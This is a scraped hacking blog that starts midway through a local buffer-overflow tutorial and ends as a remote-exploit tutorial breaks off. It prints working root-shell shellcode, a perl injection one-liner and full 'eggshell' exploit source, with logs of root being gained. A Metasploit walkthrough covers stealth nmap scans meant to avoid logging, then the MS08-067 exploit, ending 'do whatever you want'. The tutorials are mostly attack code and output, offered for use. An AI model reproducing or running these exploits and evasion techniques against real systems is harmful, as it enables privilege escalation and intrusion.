/> (gdb) x/x $ebp-4<br /><br /> 0xbffff9c4: 0x0066dc80<br /><br /> (gdb) x/x $esp<br /><br /> 0xbffff940: 0x6f6e2800<br /><br /> (gdb) q<br /><br /> The program is running. Exit anyway? (y or n) y<br /><br /><br /><br />The important part of the memory location has been highlighted with color. Next, get an address of the NOPs area. If the chosen address of the NOPs fails, try another adjacent address. The most important thing here the chosen return address must be pointing the NOPs area. Let try the following address.<br /><br /> 0xbffffba0<br /><br />Rearrange in hexadecimal representation.<br /><br /> \xbf\xff\xfb\xa0<br /><br />Little endian the return address.<br /><br /> \xa0\xfb\xff\xbf<br /><br />Then, based on our previous arrangement,<br /><br /> NOPs (72 bytes) + Shellcode (32 bytes) + ‘A’ characters (20 bytes) + Return address (4 bytes-pointing back to the NOP area) = 72 + 32 + 20 + 4 = 128 bytes<br /><br />Replace the return address of the return address part in the original argument. Take note that this is a one line command.<br /><br /> `perl -e 'print "\x90"x72, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68<br /><br /> \x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`<br /><br />Re-run the program with this new argument.<br /><br /> [bodo@lethalcode testbed2]$ whoami<br /><br /> bodo<br /><br /> [bodo@lethalcode testbed2]$ ./test `perl -e 'print "\x90"x72, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80<br /><br /> \x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`<br /><br /> sh-3.00# whoami<br /><br /> root<br /><br /> sh-3.00# id<br /><br /> uid=0(root) gid=502(bodo) groups=502(bodo) context=user_u:system_r:unconfined_t<br /><br /> sh-3.00# su -<br /><br /> [root@lethalcode ~]# whoami<br /><br /> root<br /><br /> [root@lethalcode ~]# id<br /><br /> uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t<br /><br /> [root@lethalcode ~]#<br /><br />Well, we got root in the first try! And the rest is history :o)…We passed the input strings to our program through the argv[1] (as the command line first argument). Then in the program, the strcpy() copied the input into the stack’s buffer without verifying the size, overwriting the return address nicely with an address that pointing back to the stack area. When the program finished, instead of returning back to system/OS, it return to the stack area, start executing the NOPs and proceeded to our shellcode that spawned a root shell. Our final stack layout that has been over flown should be looked something like the following:<br /><br /><br /><br />Spawning a root shell exploit - mission accomplished<br /><br />Figure 4: Spawning a root shell exploit - mission accomplished.<br /><br /><br /> <br /><br /><br /><br />EXAMPLE #2 – USING THE EGGSHELL<br /><br /><br /><br />What is eggshell?<br /><br /><br /><br />Using the classic method as shown in the previous example quite lousy isn’t it? In most cases, buffer can be too small to hold the exploit code. Let try another example using what is called an eggshell. Here, we create an eggshell on the heap that is a self-contained exploit code, and then we pass this eggshell to the environment variable, as our command line vulnerable program’s argument. Next we run the vulnerable program with argument read from the environment variable. Using this approach the exploit code can be arbitrary longer and may be the method of choice for local exploits because you need an access to environment variable. An example of the eggshell program is shown below.<br /><br /> /* exploit.c */<br /><br /> #include <unistd.h><br /><br /> #include <stdlib.h><br /><br /> <br /><br /> /* default offset is 0 */<br /><br /> #define DEFOFFSET 0<br /><br /> /* default buffer size is 512, by knowing that our vulnerable */<br /><br /> /* program’s buffer is 512 bytes */<br /><br /> #define DEFBUFFSIZE 512<br /><br /> /* No-operation instruction */<br /><br /> #define NOP 0x90<br /><br /> <br /><br /> /* our shellcode that spawn a root shell */<br /><br /> char hellcode[ ] = "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68"<br /><br /> "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";<br /><br /> <br /><br /> /* getting the esp, so that we can determine the return address */<br /><br /> unsigned long getesp(void)<br /><br /> {__asm__("movl %esp, %eax");}<br /><br /> <br /><br /> int main(int argc, char *argv[])<br /><br /> {<br /><br /> /* declare and initialize some of the variables */<br /><br /> char *buff, *ptr;<br /><br /> long *addr_ptr, retaddr;<br /><br /> int i, offset=DEFOFFSET, buffsize=DEFBUFFSIZE;<br /><br /> <br /><br /> /* If 1st argument supplied, it is the buffer size, else use default */<br /><br /> if(argc>1)<br /><br /> buffsize = atoi(argv[1]);<br /><br /> /* If 2nd argument is supplied, it is the offset, else use default */<br /><br /> if(argc>2)<br /><br /> offset = atoi(argv[2]);<br /><br /> <br /><br /> /* using the heap buffer, for our string construction */<br /><br /> if(!(buff = malloc(buffsize)))<br /><br /> {printf("Memory allocation for buffer failed lor!\n");<br /><br /> exit (0);<br /><br /> }<br /><br /> <br /><br /> /* get the return address */<br /><br /> retaddr = getesp() - offset;<br /><br /> <br /><br /> /* just to display some data */<br /><br /> printf("Using the address: %0X\n", retaddr);<br /><br /> printf("The offset is: %0X\n", offset);<br /><br /> printf("The buffer size is: %0x\n", buffsize);<br /><br /> <br /><br /> ptr = buff;<br /><br /> addr_ptr = (long *)ptr;<br /><br /> <br /><br /> /* copy the return address into the buffer, by word size */<br /><br /> for (i=0; i< buffsize; i+=4)<br /><br /> *(addr_ptr++) = retaddr;<br /><br /> <br /><br /> /* copy half of the buffer with NOP, by byte size */<br /><br /> for (i=0; i < buffsize/2; i++)<br /><br /> buff[i] = NOP;<br /><br /> <br /><br /> /* copy the shellcode after the NOPs, by byte */<br /><br /> ptr = buff + ((buffsize/2) - (strlen(hellcode)/2));<br /><br /> for (i=0; i < strlen(hellcode); i++)<br /><br /> *(ptr++) = hellcode[i];<br /><br /> <br /><br /> /* Terminate the string’s buffer with NULL */<br /><br /> buff[buffsize-1] = '\0';<br /><br /> /* Now that we've got the string built */<br /><br /> <br /><br /> /* Copy the "EGG=" string into the buffer, so that we have "EGG=our_string" */<br /><br /> memcpy(buff, "EGG=", 4);<br /><br /> /* Put the buffer, "EGG=our_string", in the environment variable,<br /><br /> as an input for our vulnerable program*/<br /><br /> putenv(buff);<br /><br /> /* run the root shell, after the overflow */<br /><br /> system("/bin/bash");<br /><br /> return 0;<br /><br /> }<br /><br />Compile and run the program. You can use the following program to verify the string in the environment variable, or use set or env commands.<br /><br /> /* testenv.c */<br /><br /> #include <unistd.h><br /><br /> <br /><br /> int main()<br /><br /> {<br /><br /> char *descr = getenv("EGG");<br /><br /> <br /><br /> if (descr)<br /><br /> printf("Value of EGG is: %s\n", descr);<br /><br /> else<br /><br /> printf("The environment variable not defined lor!\n");<br /><br /> return 0;<br /><br /> }<br /><br />Our vulnerable program is shown below. This is SUID program. We declare xbuff[512], so we need 512 and more to overflow the buffer in the stack.<br /><br /> /* vul.c */<br /><br /> #include <unistd.h><br /><br /> <br /><br /> int main(int argc, char *argv[])<br /><br /> {<br /><br /> char xbuff[512];<br /><br /> <br /><br /> if(argc >1)<br /><br /> strcpy(xbuff, argv[1]);<br /><br /> return 0;<br /><br /> }<br /><br />Or as previously done you can verify that by running the program in gdb as shown below:<br /><br /> [bodo@lethalcode testbed3]$ gdb -q vul<br /><br /> Using host libthread_db library "/lib/tls/libthread_db.so.1".<br /><br /> (gdb) disass main<br /><br /> Dump of assembler code for function main:<br /><br /> 0x08048368 <main+0>: push %ebp<br /><br /> 0x08048369 <main+1>: mov %esp, %ebp<br /><br /> 0x0804836b <main+3>: sub $0x208, %esp<br /><br /> 0x08048371 <main+9>: and $0xfffffff0, %esp<br /><br /> 0x08048374 <main+12>: mov $0x0, %eax<br /><br /> 0x08048379 <main+17>: add $0xf, %eax<br /><br /> 0x0804837c <main+20>: add $0xf, %eax<br /><br /> ...<br /><br /> [Trimmed]<br /><br /> ...<br /><br /> 0x08048396 <main+46>: pushl (%eax)<br /><br /> 0x08048398 <main+48>: lea 0xfffffdf8(%ebp), %eax<br /><br /> 0x0804839e <main+54>: push %eax<br /><br /> 0x0804839f <main+55>: call 0x80482b0 <_init+56><br /><br /> 0x080483a4 <main+60>: add $0x10, %esp<br /><br /> 0x080483a7 <main+63>: mov $0x0, %eax<br /><br /> 0x080483ac <main+68>: leave<br /><br /> 0x080483ad <main+69>: ret<br /><br /> End of assembler dump.<br /><br /> (gdb) q<br /><br /> [bodo@lethalcode testbed3]$<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />So there are 520 (0x208) bytes reserved for the stack’s buffer. We need 528 and more to overwrite the return address. Follow these steps (using the default offset):<br /><br /><br /><br /> Compile the exploit.c program with buffer size as an argument.<br /><br /> Optionally, verify the environment string of the EGG.<br /><br /> Then, compile the vul.c program and SUID it.<br /><br /> Run the vul program with $EGG as an argument.<br /><br /> If fails, repeat from step 1, by adding another 100 bytes to the argument (the buffer size).<br /><br /> [bodo@lethalcode testbed3]$ ls -F -l<br /><br /> total 60<br /><br /> -rwxrwxr-x 1 bodo bodo 7735 Feb 17 22:32 exploit*<br /><br /> -rw-rw-r-- 1 bodo bodo 1107 Feb 17 22:32 exploit.c<br /><br /> -rwxrwxr-x 1 bodo bodo 6147 Feb 27 18:19 testenv*<br /><br /> -rw-rw-r-- 1 bodo bodo 206 Feb 27 18:18 testenv.c<br /><br /> -rwsr-xr-x 1 root root 5989 Feb 17 22:24 vul*<br /><br /> -rw-rw-r-- 1 bodo bodo 121 Feb 17 21:16 vul.c<br /><br /> [bodo@lethalcode testbed3]$ whoami<br /><br /> bodo<br /><br /> [bodo@lethalcode testbed3]$ id<br /><br /> uid=502(bodo) gid=502(bodo) groups=502(bodo) context=user_u:system_r:unconfined_t<br /><br />Let try using 612 (512 + 100) for the string’s buffer size.<br /><br /> [bodo@lethalcode testbed3]$ ./exploit 612<br /><br /> Using the address: BFFFFA28<br /><br /> The offset is: 0<br /><br /> The buffer size is: 264<br /><br /> [bodo@lethalcode testbed3]$ ./testenv<br /><br /> Value of EGG is: 1ÀðÍ1ÒRhn/shh//biãRSá Íÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿<br /><br /> (úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿<br /><br /> (úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ¿(úÿ<br /><br /> [bodo@lethalcode testbed3]$ ./vul $EGG<br /><br /> Segmentation fault<br /><br /> [bodo@lethalcode testbed3]$<br /><br />First try failed. So, add another 100 bytes for the buffer size. Repeat the previous steps.<br /><br /> [bodo@lethalcode testbed3]$ ./exploit 712<br /><br /> Using the address: BFFFF7D8<br /><br /> The offset is: 0<br /><br /> The buffer size is: 2c8<br /><br /> [bodo@lethalcode testbed3]$ ./vul $EGG<br /><br /> sh-3.00# whoami<br /><br /> root<br /><br /> sh-3.00# id<br /><br /> uid=0(root) gid=502(bodo) groups=502(bodo) context=user_u:system_r:unconfined_t<br /><br /> sh-3.00# su -<br /><br /> [root@lethalcode ~]# id<br /><br /> uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t<br /><br />Well, we got root in our second try and our exploit code can be longer. Yihaaaaaaaaaaaaaaaaaaaaaa!!!!<br /><br /> </b></span><span style="font-size: small;"><b><br /><a href="http://adf.ly/2yvsn">CLICK HERE</a></b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com2tag:blogger.com,1999:blog-3299468824600484367.post-36824021400506316102011-09-29T06:52:00.001-07:002011-09-29T06:52:56.088-07:00How to get your computer to have an FBI login screen<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><img alt="[Image: img20110327121913.jpg]" border="0" src="http://i1036.photobucket.com/albums/a443/RandyCandy2/img20110327121913.jpg" /><br /><br />
1) Download LogonStudios (It's Vista version but if you have Windows 7 it works)</b>
<b><br /></b>
</span>
</div>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>http://www.megaupload.com/?d=I8DIQ2YN</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
<span style="font-weight: bold;"><span style="text-decoration: underline;">For xp users:</span></span></b>
</span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>http://www.stardock.com/products/logonstudio/downloads.asp</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
2) You can download the FBI file here<br /></b>
</span>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>http://www.wincustomize.com/explore/logonstudio_xp/9606/</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
Or<br /></b>
</span>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>http://skins19.wincustomize.com/24/79/2479496/26/9859/preview-26-9859.jpg</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
<span style="font-weight: bold;"><span style="text-decoration: underline;">Optional</span></span>
3) The switch user button was annoying me so i downloaded this to
remove it (I'm the only one on my computer so i doubt ill miss it)<br /></b>
</span>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>http://www.megaupload.com/?d=8N0EGIW4</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
Start it up, then open it and it'll do the rest<br /><br />
<span style="text-decoration: underline;"><span style="font-weight: bold;">For the users that want their 'switch user' button back download this:</span></span></b>
<b><br /></b>
</span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>http://www.megaupload.com/?d=AA5V5SFQ</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
Just run the file and it will return your button.</b></span><span style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
</span></div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com5tag:blogger.com,1999:blog-3299468824600484367.post-18782314197082666462011-09-29T06:45:00.000-07:002011-09-29T06:45:56.814-07:00Using metasploit and its exploits<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Welcome again to another ultra noob edition production. :) I know
everyone likes colors but I am indeed just going to be very
straightforward since I'm in happy land right now.<br /><br />
NOTE: I am not responsible for anything you do with this information. It is for educational purposes only.</b>
<b><br /><br />
First off we are going to set up metasploit with postgresql. (which I
use... but you can also use sqlite3 or mysql) These Structured Query
Language (SQL) databases are going to be what hold the information of a
target after scans and such.</b>
<b><br /><br />
For those of you using windows, you can go here.</b>
<b><br /><br />
<a href="http://pginstaller.projects.postgresql.org/" target="_blank">Click Me!</a></b>
<b><br /><br />
For this instalment of ultra noob edition i will be using blackbuntu. You can download blackbuntu </b><b><a href="http://www.blackbuntu.com/download" target="_blank">here!</a><br /><br />
To download backtrack you can go </b><b><a href="http://www.backtrack-linux.org/" target="_blank">here!</a><br /><br />
So once you have postgresql and its deamon running you need to run the
following commands to create a user and password for your metasploit
database.</b>
<b><br /><br />
In blackbuntu and backtrack 5 you will use the commands</b>
<b><br /></b>
</span>
</div>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>service postgresql start</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
In backtrack 4r2 and below use;</b>
</span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>/etc/init.d/postgresql-8.3 start</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
Note: you might have postgresql-8.4 as i do... so replace the 3 with a 4.<br /></b>
</span>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>sudo su postgres -c psql<br />
ALTER USER postgres WITH PASSWORD 'your password';<br />
<br />
\q<br />
<br />
sudo passwd -d postgres<br />
sudo su postgres -c passwd</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
Note: if using backtrack ignore the sudo commands as you are already root.<br /><br />
What this does is set up a user postgres with whatever password you choose.</b>
<b><br /><br />
Now to create/connect to the postgresql database in metasploit you need to use the commands. Once inside metasploit.</b>
<b><br /></b>
</span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>db_connect postgres:yourpassword@127.0.0.1/msf3</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
<a href="http://img39.imageshack.us/i/metasploit1.png/" target="_blank"><img alt="[Image: metasploit1.png]" border="0" src="http://img39.imageshack.us/img39/3849/metasploit1.png" /></a><br /><br />
This will create a postgresql database called msf3 if you haven't
already. If you have it will just connect to it. (As shown in mine)</b>
<b><br />
This is where the show really gets going.<br />
Now you have two options... you can scan your network using outside tools to find the ip addresses or use an nmap ping scan.<br /><br />
To use a ping scan with nmap you would use nmap from the db_nmap command
because it automatically adds hosts in the network to your new
postgresql database.</b>
<b><br /></b>
</span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>db_nmap -Pn -v 192.168.1.1-255</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
<a href="http://img838.imageshack.us/i/metasploit2.png/" target="_blank"><img alt="[Image: metasploit2.png]" border="0" src="http://img838.imageshack.us/img838/1351/metasploit2.png" /></a><br /><br />
Now the -Pn argument tells nmap to run a ping scan on port 80 to decide
what hosts are up and will add them to your database, while the -v
command tells nmap to run in verbose mode giving you more detailed
feedback while the scan is running.</b>
<b><br />
Now after you have a list of live hosts you can run nmap in a new mode.</b>
</span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>db_nmap -sS -sV -sU -n -O -v 192.168.1.4</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
<a href="http://img59.imageshack.us/i/metasploit3.png/" target="_blank"><img alt="[Image: metasploit3.png]" border="0" src="http://img59.imageshack.us/img59/4308/metasploit3.png" /></a><br /><br />
NOTE: VERY IMPORTANT. RUNNING THE -sS COMMAND VS THE -sT COMMAND.</b>
<b><br />
THE -sT COMMAND COMPLETES A FULL TCP CONNECTION WHICH GETS LOGGED BY THE
REMOTE HOST. TO PREVENT THIS RUNNING A STEALTH SYN SCAN WITH THE -sS
COMMAND IS THE BEST OPTION. I HAVE STATED THIS IN OTHER TUTS ABOUT NMAP
BUT TO STAY ANON YOU NEED TO DO THIS.<br /><br />
Now i run the ip 192.168.1.4 because that is what is currently on my network. </b><b><br />
The -sS command runs a stealth syn scan which does not create a full tcp
connection and allows you to continue unlogged. The -sV scan will tell
you what services are running on a certain port which will come into
play when selecting an exploit to use.<br />
The -sU command runs a udp port scan against the target, and since there
is no reply from udp packets they never get logged in the first place.
The -O scan runs an OS scan against the target using tcp fingerprinting
to tell you the operating system of the target machine, this will also
come to play when selecting an exploit. The -n command tells nmap to not
run a -Pn or ping scan agianst the target as they get logged, and since
you have already done that once you wouldn't want to do it again.<br />
And again the -v command runs nmap in verbose mode which allows you to
see more of whats going on in the behind the scenes and helps you better
understand what is happening.<br /><br />
Now once you have a list of open ports you can begin to choose your
exploit based on port and operating system. For this exercise I chose
the windows/smb/ms08_067_netapi exploit.</b>
<b><br /><br />
Now since port 445 is open I will attempt to run the ms08_067_netapi
exploit against the target. So with metasploit open we will run</b>
<b><br /></b>
</span>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>use windows/smb/ms08_067_netapi <br />
set payload windows/bind_tcp<br />
set rhost 192.168.1.4<br />
set lhost 192.168.1.3<br />
set lport 5150<br />
check</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
NOTE:Run the show options command to display what information is required for the exploit to work properly.<br /><br />
<a href="http://img684.imageshack.us/i/metasploit4.png/" target="_blank"><img alt="[Image: metasploit4.png]" border="0" src="http://img684.imageshack.us/img684/1811/metasploit4.png" /></a></b>
<b><br /><br />
Now these commands in metasploit will first set the exploit to use as the windows/smb/ms08_067_netapi exploit.</b>
<b><br />
The second sets metasploit to use a bind shell using tcp protocal.<br />
<br />
<br /><br />
The third sets the remote host to our target ip. The fourth sets the
localhost to our ip, and the local port the one we want to listen on.</b>
<b><br />
Running the check command will tell us if the target is vulnerable or not.<br /><br />
And as you can see it is. So now we will run the exploit command </b><b><br /></b>
</span>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>exploit</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
<a href="http://img718.imageshack.us/i/metasploit5.png/" target="_blank"><img alt="[Image: metasploit5.png]" border="0" src="http://img718.imageshack.us/img718/348/metasploit5.png" /></a><br /><br />
From there meterpreter will open. You can go here for all the meterpreter commands.</b>
<b><br /><br />
<br /><br />
Now your in.... All you need to do is to do whatever you want. LOL</b>
<b><br />
This Has been another ultra noob edition tutorial.<br /><br />
References</b>
<b><br /><br />
<a href="http://www.backtrack-linux.org/forums/backtrack-howtos/28933-metasploit-db_autopwn-using-postgresql.html" target="_blank">http://www.backtrack-linux.org/forums/ba...resql.html</a></b>
<b><br /><br />
<a href="http://hackforums.net/showthread.php?tid=970352" target="_blank">http://hackforums.net/showthread.php?tid=970352</a></b>
<b><br /><br />
If I missed a ref or something let me know. I will fix it immediatly.</b>
<b><br /><br />
P.S. Will be adding things and command explanations as necissary just P.M. me for any help or explanations.</b>
<b><br /><br />
Also would very much appreciate feedback on what I could improve within the tut and whether or not it was enjoyed/helpful. </b><b><br /><br />
<br /><br />
<br />
P.S.S. Am still making the cracking WPA with aircrack tutorial....
pretty much was just too lazy to do it recently as i am going to be a
father... :)</b>
<b><br /></b>
</span>
<hr style="color: #666666; font-family: Arial,Helvetica,sans-serif;" />
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
Really? no feedback or anything about this post? Thats disapointing.. if
i cant get more then a single thank you i might as well stop making
tuts
</b></span></div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com2tag:blogger.com,1999:blog-3299468824600484367.post-48664364431286332972011-09-28T06:27:00.001-07:002011-09-28T06:27:58.359-07:00How to write remote exploits ( V. 1.1)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>I hope you’ll enjoy it, ok what are we going to do? We want to exploit a vulnerable server program (vulnerable.c). We want to get a remote shell. In case you are looking for an exercise, read the vulnerable.c program, compile it and try to exploit it. If you don’t have any clue about remote exploits…… well then read further and let us first take a look at the vulnerable program… later we want to look at the functions of the vulnerable program, then how we can abuse an overflow within the program, then we want to define the general structure of the exploit code, and at last we want to write an exploit…<br /><br /><br /><br />-------------------------------------------- vulnerable.c ----------------------------------------------<br /><br /><br />#include <stdio.h><br />#include <netdb.h><br />#include <netinet/in.h><br /><br /><br />#define BUFFER_SIZE 1024<br />#define NAME_SIZE 2048<br /><br />int handling(int c)<br /><br />{<br />char buffer[BUFFER_SIZE], name[NAME_SIZE];<br />int bytes;<br />strcpy(buffer, "My name is: ");<br />bytes = send(c, buffer, strlen(buffer), 0);<br />if (bytes == -1)<br />return -1;<br />bytes = recv(c, name, sizeof(name), 0);<br />if (bytes == -1)<br />return -1;<br />name[bytes - 1] = ’\0’;<br />sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);<br />bytes = send(c, buffer, strlen(buffer), 0);<br />if (bytes == -1)<br />return -1;<br />return 0;<br /><br />}<br /><br />int main(int argc, char *argv[])<br /><br />{<br />int s, c, cli_size;<br />struct sockaddr_in srv, cli;<br />if (argc != 2)<br />{<br />fprintf(stderr, "usage: %s port\n", argv[0]);<br />return 1;<br />}<br />s = socket(AF_INET, SOCK_STREAM, 0);<br />if (s == -1)<br />{<br />perror("socket() failed");<br />return 2;<br />}<br />srv.sin_addr.s_addr = INADDR_ANY;<br />srv.sin_port = htons( (unsigned short int) atol(argv[1]));<br />srv.sin_family = AF_INET;<br />if (bind(s, &srv, sizeof(srv)) == -1)<br />{<br />perror("bind() failed");<br />return 3;<br />}<br />if (listen(s, 3) == -1)<br />{<br />perror("listen() failed");<br />return 4;<br />}<br />for(;;)<br />{<br />c = accept(s, &cli, &cli_size);<br />if (c == -1)<br />{<br />perror("accept() failed");<br />return 5;<br />}<br />printf("client from %s", inet_ntoa(cli.sin_addr));<br />if (handling(c) == -1)<br />fprintf(stderr, "%s: handling() failed", argv[0]);<br />close(c);<br />}<br />return 0;<br /><br />}<br /><br />---------------------------------------------- EOF------------------------------------------------------<br /><br />Here’s how you must compile and use the program.<br /><br />user@linux:~/ > gcc vulnerable.c -o vulnerable<br /><br />user@linux:~/ > ./vulnerable 8080<br /><br />./vulnerable 8080 this means, that you run the service on port 8080, look at the port you wanna take, you mustn’t use a privileged port (1 – 1024) assuming you are not root.<br /><br />Now we’ve compiled the program and we know how to run it.. with the parameter<br /><br />program <port><br /><br />Now we want check some addresses of the program, and take a look on how it is built. We start the vulnerable program with gdb, to look at some things…<br /><br /><br /><br /><br /><br />now do the following:<br /><br />user@linux~/ > gdb vulnerable<br /><br />GNU gdb 4.18<br /><br />Copyright 1998 Free Software Foundation, Inc.<br /><br />GDB is free software, covered by the GNU General Public License, and you are<br /><br />welcome to change it and/or distribute copies of it under certain conditions.<br /><br />Type "show copying" to see the conditions.<br /><br />There is absolutely no warranty for GDB. Type "show warranty" for details.<br /><br />This GDB was configured as "i386-suse-linux"...<br /><br />(gdb) run 8080<br /><br />Starting program: /home/user/directory/vulnerable 8080<br /><br />Now the program is listening for an incoming connection on port 8080.<br /><br />Next connect with telnet or netcat on port 8080.<br /><br />user@linux:~/ > telnet localhost 8080<br /><br />Trying ::1...<br /><br />telnet: connect to address ::1: Connection refused<br /><br />Trying 127.0.0.1...<br /><br />Connected to localhost.<br /><br />Escape character is '^]'.<br /><br />My name is: Robin<br /><br />, nice to meet you!<br /><br />Connection closed by foreign host.<br /><br />user@linux:~/ ><br /><br />Now the easy server program doesn’t make anything else then getting a name and writing it back on your screen…. Ok let’s go further…<br /><br />While you made this, the gdb (debugger) wrote the following on the screen:<br /><br />client from 127.0.0.1 0xbffff28c<br /><br />/*Don’t be confused if the address is different on your computer, on my box it is 0xbffff28c */<br /><br />Ok the server is still running because of the for-loop, so it’s always repeating until you kill the server program.<br /><br />3. Overflowing the server program<br /><br />Let's test something....<br /><br />Now we reconnect to the service on port 8080 and put more than 1024 bytes of characters on the command line "My name is:..."<br /><br />It should look like this... (I'll take A's *g*)...<br /><br />user@linux:~/ > telnet localhost 8080<br /><br />Trying ::1...<br /><br />telnet: connect to address ::1: Connection refused<br /><br />Trying 127.0.0.1...<br /><br 